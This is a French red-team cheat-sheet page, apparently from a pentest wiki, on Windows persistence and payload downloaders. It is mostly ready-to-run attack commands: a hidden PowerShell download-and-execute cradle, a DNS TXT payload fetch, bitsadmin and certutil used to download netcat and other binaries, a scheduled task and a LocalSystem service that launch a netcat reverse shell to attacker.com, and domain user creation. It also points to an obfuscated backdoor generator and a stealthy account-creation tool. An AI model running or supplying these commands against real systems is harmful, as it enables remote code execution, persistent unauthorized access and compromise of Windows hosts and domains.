Persistance / Downloaders

Mindmap

Downloader Powershell

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<ip>:<port>/<file>'))"

Si l'utilisation de IEX est bloqué, il est également possible de stocker son payload dans un enregistrement TXT d'un serveur DNS.

powershell.exe (nslookup -q=txt attacker.dns)[-1]

Lolbins

Les lolbins sont des exécutables natifs dans Windows dont l'usage peut être contournés à des fins malveillantes.

Pour plus d'infos: https://lolbas-project.github.io/

BITSAdmin

Background Intelligent Transfer Service (BITS) est un service Windows permettant le transfert de fichiers en arrière-plan de façon intelligente depuis ou vers un serveur.

bitsadmin /transfer myjob /download /priority high http://attacker.com/nc64.exe c:\temp\nc.exe

Certutil

Certutil est un programme en ligne de commande, installé dans le cadre des services de certificats. Vous pouvez l'utiliser pour vider et afficher les informations de configuration de l’autorité de certification, configurer les services de certificat, sauvegarder et restaurer les composants de l’autorité de certification, et vérifier les certificats, les paires de clés et les chaînes de certificats.

Il est possible de contourner son usage légitime pour télécharger des programmes malveillants de cette manière.

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Tâches planifiées

Exemple de création d'une tâche planifiée qui lance "shell.exe" toutes les minutes:

schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.exe /ru "SYSTEM"

Service

Exemple de création d'un service malveillant avec netcat:

> sc create <evilsvc> binpath= "c:\tools\nc attacker.com 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
> sc start <evilsvc>

Créer un utilisateur

net user <username> <password> /add /domain

Outils

Villain

Villain est un outil permettant de créer des portes dérobées obfusqué "indetectable" par les anti-virus.

Exemple d'utilisation:

$ ./Villain.py
villain > generate os=windows lhost=eth0 obfuscate
villain > sessions
villain > shell <Session ID>

ressource: https://github.com/t3l3machus/Villain

Suborner

Suborner permet de créer des utilisateurs windows discret sans utilisation de "net user" ou de "netapi32::netuseradd".

source: https://github.com/r4wd3r/Suborner

PrécédentEffacement des tracesSuivantDefense evasion

Dernière mise à jour

Cet article vous a-t-il été utile ?